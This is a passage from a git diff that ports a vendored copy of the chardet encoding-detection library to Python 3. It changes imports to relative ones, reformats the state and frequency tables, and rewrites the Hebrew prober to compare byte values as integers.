(0, 0, 0, 0, 0, 0, 0, 0, 0) 
@@ -133,51 +133,51 @@ ISO2022CNSMModel = {'classTable': ISO2022CN_cls, 'charLenTable': ISO2022CNCharLenTable, 'name': "ISO-2022-CN"} -ISO2022JP_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,2,2, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,7,0,0,0, # 20 - 27 -3,0,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -6,0,4,0,8,0,0,0, # 40 - 47 -0,9,5,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022JP_cls = ( +2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,2,2, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,7,0,0,0, # 20 - 27 +3,0,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +6,0,4,0,8,0,0,0, # 40 - 47 +0,9,5,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022JP_st = ( \ -eStart, 
3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 -eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 -eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f -eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 -eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f -eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 -eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f -eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 +ISO2022JP_st = ( +eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07 +eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17 +eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f +eError, 5,eError,eError,eError, 4,eError,eError,# 20-27 +eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f +eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37 +eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f +eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47 ) ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0) @@ -188,47 +188,47 @@ ISO2022JPSMModel = {'classTable': ISO2022JP_cls, 'charLenTable': ISO2022JPCharLenTable, 'name': "ISO-2022-JP"} -ISO2022KR_cls = ( \ -2,0,0,0,0,0,0,0, # 00 - 07 -0,0,0,0,0,0,0,0, # 08 - 0f -0,0,0,0,0,0,0,0, # 10 - 17 -0,0,0,1,0,0,0,0, # 18 - 1f -0,0,0,0,3,0,0,0, # 20 - 27 -0,4,0,0,0,0,0,0, # 28 - 2f -0,0,0,0,0,0,0,0, # 30 - 37 -0,0,0,0,0,0,0,0, # 38 - 3f -0,0,0,5,0,0,0,0, # 40 - 47 -0,0,0,0,0,0,0,0, # 48 - 4f -0,0,0,0,0,0,0,0, # 50 - 57 -0,0,0,0,0,0,0,0, # 58 - 5f -0,0,0,0,0,0,0,0, # 60 - 67 -0,0,0,0,0,0,0,0, # 68 - 6f -0,0,0,0,0,0,0,0, # 70 - 77 -0,0,0,0,0,0,0,0, # 78 - 7f -2,2,2,2,2,2,2,2, # 80 - 87 -2,2,2,2,2,2,2,2, # 88 - 8f -2,2,2,2,2,2,2,2, # 90 - 97 -2,2,2,2,2,2,2,2, # 98 - 9f -2,2,2,2,2,2,2,2, # a0 - a7 -2,2,2,2,2,2,2,2, # a8 - af -2,2,2,2,2,2,2,2, # b0 - 
b7 -2,2,2,2,2,2,2,2, # b8 - bf -2,2,2,2,2,2,2,2, # c0 - c7 -2,2,2,2,2,2,2,2, # c8 - cf -2,2,2,2,2,2,2,2, # d0 - d7 -2,2,2,2,2,2,2,2, # d8 - df -2,2,2,2,2,2,2,2, # e0 - e7 -2,2,2,2,2,2,2,2, # e8 - ef -2,2,2,2,2,2,2,2, # f0 - f7 -2,2,2,2,2,2,2,2, # f8 - ff +ISO2022KR_cls = ( +2,0,0,0,0,0,0,0, # 00 - 07 +0,0,0,0,0,0,0,0, # 08 - 0f +0,0,0,0,0,0,0,0, # 10 - 17 +0,0,0,1,0,0,0,0, # 18 - 1f +0,0,0,0,3,0,0,0, # 20 - 27 +0,4,0,0,0,0,0,0, # 28 - 2f +0,0,0,0,0,0,0,0, # 30 - 37 +0,0,0,0,0,0,0,0, # 38 - 3f +0,0,0,5,0,0,0,0, # 40 - 47 +0,0,0,0,0,0,0,0, # 48 - 4f +0,0,0,0,0,0,0,0, # 50 - 57 +0,0,0,0,0,0,0,0, # 58 - 5f +0,0,0,0,0,0,0,0, # 60 - 67 +0,0,0,0,0,0,0,0, # 68 - 6f +0,0,0,0,0,0,0,0, # 70 - 77 +0,0,0,0,0,0,0,0, # 78 - 7f +2,2,2,2,2,2,2,2, # 80 - 87 +2,2,2,2,2,2,2,2, # 88 - 8f +2,2,2,2,2,2,2,2, # 90 - 97 +2,2,2,2,2,2,2,2, # 98 - 9f +2,2,2,2,2,2,2,2, # a0 - a7 +2,2,2,2,2,2,2,2, # a8 - af +2,2,2,2,2,2,2,2, # b0 - b7 +2,2,2,2,2,2,2,2, # b8 - bf +2,2,2,2,2,2,2,2, # c0 - c7 +2,2,2,2,2,2,2,2, # c8 - cf +2,2,2,2,2,2,2,2, # d0 - d7 +2,2,2,2,2,2,2,2, # d8 - df +2,2,2,2,2,2,2,2, # e0 - e7 +2,2,2,2,2,2,2,2, # e8 - ef +2,2,2,2,2,2,2,2, # f0 - f7 +2,2,2,2,2,2,2,2, # f8 - ff ) -ISO2022KR_st = ( \ -eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 -eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f -eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 -eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f -eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 +ISO2022KR_st = ( +eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07 +eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f +eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17 +eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f +eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27 ) ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0) @@ -238,3 +238,5 @@ ISO2022KRSMModel = {'classTable': ISO2022KR_cls, 'stateTable': ISO2022KR_st, 'charLenTable': 
ISO2022KRCharLenTable, 'name': "ISO-2022-KR"} + +# flake8: noqa diff --git a/thirdparty/chardet/eucjpprober.py b/thirdparty/chardet/eucjpprober.py index faa5cb58d..8e64fdcc2 100644 --- a/thirdparty/chardet/eucjpprober.py +++ b/thirdparty/chardet/eucjpprober.py @@ -13,25 +13,26 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCJPDistributionAnalysis -from jpcntx import EUCJPContextAnalysis -from mbcssm import EUCJPSMModel +import sys +from . 
import constants +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCJPDistributionAnalysis +from .jpcntx import EUCJPContextAnalysis +from .mbcssm import EUCJPSMModel + class EUCJPProber(MultiByteCharSetProber): def __init__(self): @@ -50,31 +51,35 @@ class EUCJPProber(MultiByteCharSetProber): def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): + # PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] self._mContextAnalyzer.feed(self._mLastChar, charLen) self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mContextAnalyzer.feed(aBuf[i-1:i+1], charLen) - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) + self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mContextAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/euckrfreq.py b/thirdparty/chardet/euckrfreq.py index 1463fa1d8..a179e4c21 100644 
--- a/thirdparty/chardet/euckrfreq.py +++ b/thirdparty/chardet/euckrfreq.py @@ -592,3 +592,5 @@ EUCKRCharToFreqOrder = ( \ 8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719, 8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735, 8736,8737,8738,8739,8740,8741) + +# flake8: noqa diff --git a/thirdparty/chardet/euckrprober.py b/thirdparty/chardet/euckrprober.py index bd697ebf3..5982a46b6 100644 --- a/thirdparty/chardet/euckrprober.py +++ b/thirdparty/chardet/euckrprober.py @@ -13,22 +13,23 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCKRDistributionAnalysis -from mbcssm import EUCKRSMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCKRDistributionAnalysis +from .mbcssm import EUCKRSMModel + class EUCKRProber(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/euctwfreq.py b/thirdparty/chardet/euctwfreq.py index c05720950..576e7504d 100644 --- a/thirdparty/chardet/euctwfreq.py +++ b/thirdparty/chardet/euctwfreq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser 
General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -26,8 +26,8 @@ ######################### END LICENSE BLOCK ######################### # EUCTW frequency table -# Converted from big5 work -# by Taiwan's Mandarin Promotion Council +# Converted from big5 work +# by Taiwan's Mandarin Promotion Council # # 128 --> 0.42261 @@ -38,15 +38,15 @@ # # Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98 # Random Distribution Ration = 512/(5401-512)=0.105 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75 -# Char to FreqOrder table , +# Char to FreqOrder table , EUCTW_TABLE_SIZE = 8102 -EUCTWCharToFreqOrder = ( \ +EUCTWCharToFreqOrder = ( 1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742 3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758 1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774 @@ -424,3 +424,5 @@ EUCTWCharToFreqOrder = ( \ 8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,8704,8705,8706,8707,8708,8709, # 8710 8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,8720,8721,8722,8723,8724,8725, # 8726 8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,8736,8737,8738,8739,8740,8741) # 8742 + +# flake8: noqa diff --git a/thirdparty/chardet/euctwprober.py b/thirdparty/chardet/euctwprober.py index b073f134f..fe652fe37 100644 --- a/thirdparty/chardet/euctwprober.py 
+++ b/thirdparty/chardet/euctwprober.py @@ -25,10 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import EUCTWDistributionAnalysis -from mbcssm import EUCTWSMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import EUCTWDistributionAnalysis +from .mbcssm import EUCTWSMModel class EUCTWProber(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/gb2312freq.py b/thirdparty/chardet/gb2312freq.py index 7a4d5a1b3..1238f510f 100644 --- a/thirdparty/chardet/gb2312freq.py +++ b/thirdparty/chardet/gb2312freq.py @@ -13,12 +13,12 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA @@ -36,14 +36,14 @@ # # Ideal Distribution Ratio = 0.79135/(1-0.79135) = 3.79 # Random Distribution Ration = 512 / (3755 - 512) = 0.157 -# +# # Typical Distribution Ratio about 25% of Ideal one, still much higher that RDR GB2312_TYPICAL_DISTRIBUTION_RATIO = 0.9 GB2312_TABLE_SIZE = 3760 -GB2312CharToFreqOrder = ( \ +GB2312CharToFreqOrder = ( 1671, 749,1443,2364,3924,3807,2330,3921,1704,3463,2691,1511,1515, 572,3191,2205, 2361, 224,2558, 479,1711, 963,3162, 440,4060,1905,2966,2947,3580,2647,3961,3842, 2204, 869,4207, 970,2678,5626,2944,2956,1479,4048, 514,3595, 588,1346,2820,3409, @@ -469,3 +469,4 @@ GB2312CharToFreqOrder = ( \ 5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978, 4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767) +# flake8: noqa diff --git a/thirdparty/chardet/gb2312prober.py b/thirdparty/chardet/gb2312prober.py index 91eb3925a..0325a2d86 100644 --- a/thirdparty/chardet/gb2312prober.py +++ b/thirdparty/chardet/gb2312prober.py @@ -25,10 +25,10 @@ # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import GB2312DistributionAnalysis -from mbcssm import GB2312SMModel +from .mbcharsetprober import MultiByteCharSetProber +from .codingstatemachine import CodingStateMachine +from .chardistribution import GB2312DistributionAnalysis +from .mbcssm import GB2312SMModel class GB2312Prober(MultiByteCharSetProber): def __init__(self): diff --git a/thirdparty/chardet/hebrewprober.py b/thirdparty/chardet/hebrewprober.py index 442c0bf2b..ba225c5ef 100644 --- a/thirdparty/chardet/hebrewprober.py +++ b/thirdparty/chardet/hebrewprober.py @@ -13,20 +13,21 @@ 
# modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetprober import CharSetProber -import constants +from .charsetprober import CharSetProber +from .constants import eNotMe, eDetecting +from .compat import wrap_ord # This prober doesn't actually recognize a language or a charset. # It is a helper prober for the use of the Hebrew model probers @@ -35,40 +36,40 @@ import constants # # Four main charsets exist in Hebrew: # "ISO-8859-8" - Visual Hebrew -# "windows-1255" - Logical Hebrew +# "windows-1255" - Logical Hebrew # "ISO-8859-8-I" - Logical Hebrew # "x-mac-hebrew" - ?? Logical Hebrew ?? # # Both "ISO" charsets use a completely identical set of code points, whereas -# "windows-1255" and "x-mac-hebrew" are two different proper supersets of +# "windows-1255" and "x-mac-hebrew" are two different proper supersets of # these code points. windows-1255 defines additional characters in the range -# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific +# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific # diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6. -# x-mac-hebrew defines similar additional code points but with a different +# x-mac-hebrew defines similar additional code points but with a different # mapping. 
# -# As far as an average Hebrew text with no diacritics is concerned, all four -# charsets are identical with respect to code points. Meaning that for the -# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters +# As far as an average Hebrew text with no diacritics is concerned, all four +# charsets are identical with respect to code points. Meaning that for the +# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters # (including final letters). # # The dominant difference between these charsets is their directionality. # "Visual" directionality means that the text is ordered as if the renderer is -# not aware of a BIDI rendering algorithm. The renderer sees the text and -# draws it from left to right. The text itself when ordered naturally is read +# not aware of a BIDI rendering algorithm. The renderer sees the text and +# draws it from left to right. The text itself when ordered naturally is read # backwards. A buffer of Visual Hebrew generally looks like so: # "[last word of first line spelled backwards] [whole line ordered backwards -# and spelled backwards] [first word of first line spelled backwards] +# and spelled backwards] [first word of first line spelled backwards] # [end of line] [last word of second line] ... etc' " # adding punctuation marks, numbers and English text to visual text is # naturally also "visual" and from left to right. -# +# # "Logical" directionality means the text is ordered "naturally" according to -# the order it is read. It is the responsibility of the renderer to display -# the text from right to left. A BIDI algorithm is used to place general +# the order it is read. It is the responsibility of the renderer to display +# the text from right to left. A BIDI algorithm is used to place general # punctuation marks, numbers and English text in the text. # -# Texts in x-mac-hebrew are almost impossible to find on the Internet. 
From +# Texts in x-mac-hebrew are almost impossible to find on the Internet. From # what little evidence I could find, it seems that its general directionality # is Logical. # @@ -76,17 +77,17 @@ import constants # charsets: # Visual Hebrew - "ISO-8859-8" - backwards text - Words and sentences are # backwards while line order is natural. For charset recognition purposes -# the line order is unimportant (In fact, for this implementation, even +# the line order is unimportant (In fact, for this implementation, even # word order is unimportant). # Logical Hebrew - "windows-1255" - normal, naturally ordered text. # -# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be +# "ISO-8859-8-I" is a subset of windows-1255 and doesn't need to be # specifically identified. # "x-mac-hebrew" is also identified as windows-1255. A text in x-mac-hebrew # that contain special punctuation marks or diacritics is displayed with # some unconverted characters showing as question marks. This problem might # be corrected using another model prober for x-mac-hebrew. Due to the fact -# that x-mac-hebrew texts are so rare, writing another model prober isn't +# that x-mac-hebrew texts are so rare, writing another model prober isn't # worth the effort and performance hit. # #### The Prober #### @@ -126,28 +127,31 @@ import constants # charset identified, either "windows-1255" or "ISO-8859-8". # windows-1255 / ISO-8859-8 code points of interest -FINAL_KAF = '\xea' -NORMAL_KAF = '\xeb' -FINAL_MEM = '\xed' -NORMAL_MEM = '\xee' -FINAL_NUN = '\xef' -NORMAL_NUN = '\xf0' -FINAL_PE = '\xf3' -NORMAL_PE = '\xf4' -FINAL_TSADI = '\xf5' -NORMAL_TSADI = '\xf6' +FINAL_KAF = 0xea +NORMAL_KAF = 0xeb +FINAL_MEM = 0xed +NORMAL_MEM = 0xee +FINAL_NUN = 0xef +NORMAL_NUN = 0xf0 +FINAL_PE = 0xf3 +NORMAL_PE = 0xf4 +FINAL_TSADI = 0xf5 +NORMAL_TSADI = 0xf6 # Minimum Visual vs Logical final letter score difference. -# If the difference is below this, don't rely solely on the final letter score distance. 
+# If the difference is below this, don't rely solely on the final letter score +# distance. MIN_FINAL_CHAR_DISTANCE = 5 # Minimum Visual vs Logical model score difference. -# If the difference is below this, don't rely at all on the model score distance. +# If the difference is below this, don't rely at all on the model score +# distance. MIN_MODEL_DISTANCE = 0.01 VISUAL_HEBREW_NAME = "ISO-8859-8" LOGICAL_HEBREW_NAME = "windows-1255" + class HebrewProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -159,8 +163,8 @@ class HebrewProber(CharSetProber): self._mFinalCharLogicalScore = 0 self._mFinalCharVisualScore = 0 # The two last characters seen in the previous buffer, - # mPrev and mBeforePrev are initialized to space in order to simulate a word - # delimiter at the beginning of the data + # mPrev and mBeforePrev are initialized to space in order to simulate + # a word delimiter at the beginning of the data self._mPrev = ' ' self._mBeforePrev = ' ' # These probers are owned by the group prober. @@ -170,49 +174,52 @@ class HebrewProber(CharSetProber): self._mVisualProber = visualProber def is_final(self, c): - return c in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, FINAL_TSADI] + return wrap_ord(c) in [FINAL_KAF, FINAL_MEM, FINAL_NUN, FINAL_PE, + FINAL_TSADI] def is_non_final(self, c): - # The normal Tsadi is not a good Non-Final letter due to words like - # 'lechotet' (to chat) containing an apostrophe after the tsadi. This - # apostrophe is converted to a space in FilterWithoutEnglishLetters causing - # the Non-Final tsadi to appear at an end of a word even though this is not - # the case in the original text. - # The letters Pe and Kaf rarely display a related behavior of not being a - # good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' for - # example legally end with a Non-Final Pe or Kaf. However, the benefit of - # these letters as Non-Final letters outweighs the damage since these words - # are quite rare. 
- return c in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] + # The normal Tsadi is not a good Non-Final letter due to words like + # 'lechotet' (to chat) containing an apostrophe after the tsadi. This + # apostrophe is converted to a space in FilterWithoutEnglishLetters + # causing the Non-Final tsadi to appear at an end of a word even + # though this is not the case in the original text. + # The letters Pe and Kaf rarely display a related behavior of not being + # a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak' + # for example legally end with a Non-Final Pe or Kaf. However, the + # benefit of these letters as Non-Final letters outweighs the damage + # since these words are quite rare. + return wrap_ord(c) in [NORMAL_KAF, NORMAL_MEM, NORMAL_NUN, NORMAL_PE] def feed(self, aBuf): # Final letter analysis for logical-visual decision. - # Look for evidence that the received buffer is either logical Hebrew or - # visual Hebrew. + # Look for evidence that the received buffer is either logical Hebrew + # or visual Hebrew. # The following cases are checked: - # 1) A word longer than 1 letter, ending with a final letter. This is an - # indication that the text is laid out "naturally" since the final letter - # really appears at the end. +1 for logical score. - # 2) A word longer than 1 letter, ending with a Non-Final letter. In normal - # Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, should not end with - # the Non-Final form of that letter. Exceptions to this rule are mentioned - # above in isNonFinal(). This is an indication that the text is laid out - # backwards. +1 for visual score - # 3) A word longer than 1 letter, starting with a final letter. Final letters - # should not appear at the beginning of a word. This is an indication that - # the text is laid out backwards. +1 for visual score. - # - # The visual score and logical score are accumulated throughout the text and - # are finally checked against each other in GetCharSetName(). 
- # No checking for final letters in the middle of words is done since that case - # is not an indication for either Logical or Visual text. - # - # We automatically filter out all 7-bit characters (replace them with spaces) - # so the word boundary detection works properly. [MAP] + # 1) A word longer than 1 letter, ending with a final letter. This is + # an indication that the text is laid out "naturally" since the + # final letter really appears at the end. +1 for logical score. + # 2) A word longer than 1 letter, ending with a Non-Final letter. In + # normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi, + # should not end with the Non-Final form of that letter. Exceptions + # to this rule are mentioned above in isNonFinal(). This is an + # indication that the text is laid out backwards. +1 for visual + # score + # 3) A word longer than 1 letter, starting with a final letter. Final + # letters should not appear at the beginning of a word. This is an + # indication that the text is laid out backwards. +1 for visual + # score. + # + # The visual score and logical score are accumulated throughout the + # text and are finally checked against each other in GetCharSetName(). + # No checking for final letters in the middle of words is done since + # that case is not an indication for either Logical or Visual text. + # + # We automatically filter out all 7-bit characters (replace them with + # spaces) so the word boundary detection works properly. [MAP] - if self.get_state() == constants.eNotMe: + if self.get_state() == eNotMe: # Both model probers say it's not them. No reason to continue. 
- return constants.eNotMe + return eNotMe aBuf = self.filter_high_bit_only(aBuf) @@ -220,23 +227,27 @@ class HebrewProber(CharSetProber): if cur == ' ': # We stand on a space - a word just ended if self._mBeforePrev != ' ': - # next-to-last char was not a space so self._mPrev is not a 1 letter word + # next-to-last char was not a space so self._mPrev is not a + # 1 letter word if self.is_final(self._mPrev): # case (1) [-2:not space][-1:final letter][cur:space] self._mFinalCharLogicalScore += 1 elif self.is_non_final(self._mPrev): - # case (2) [-2:not space][-1:Non-Final letter][cur:space] + # case (2) [-2:not space][-1:Non-Final letter][ + # cur:space] self._mFinalCharVisualScore += 1 else: # Not standing on a space - if (self._mBeforePrev == ' ') and (self.is_final(self._mPrev)) and (cur != ' '): + if ((self._mBeforePrev == ' ') and + (self.is_final(self._mPrev)) and (cur != ' ')): # case (3) [-2:space][-1:final letter][cur:not space] self._mFinalCharVisualScore += 1 self._mBeforePrev = self._mPrev self._mPrev = cur - # Forever detecting, till the end or until both model probers return eNotMe (handled above) - return constants.eDetecting + # Forever detecting, till the end or until both model probers return + # eNotMe (handled above) + return eDetecting def get_charset_name(self): # Make the decision: is it Logical or Visual? @@ -248,22 +259,25 @@ class HebrewProber(CharSetProber): return VISUAL_HEBREW_NAME # It's not dominant enough, try to rely on the model scores instead. - modelsub = self._mLogicalProber.get_confidence() - self._mVisualProber.get_confidence() + modelsub = (self._mLogicalProber.get_confidence() + - self._mVisualProber.get_confidence()) if modelsub > MIN_MODEL_DISTANCE: return LOGICAL_HEBREW_NAME if modelsub < -MIN_MODEL_DISTANCE: return VISUAL_HEBREW_NAME - # Still no good, back to final letter distance, maybe it'll save the day. + # Still no good, back to final letter distance, maybe it'll save the + # day. 
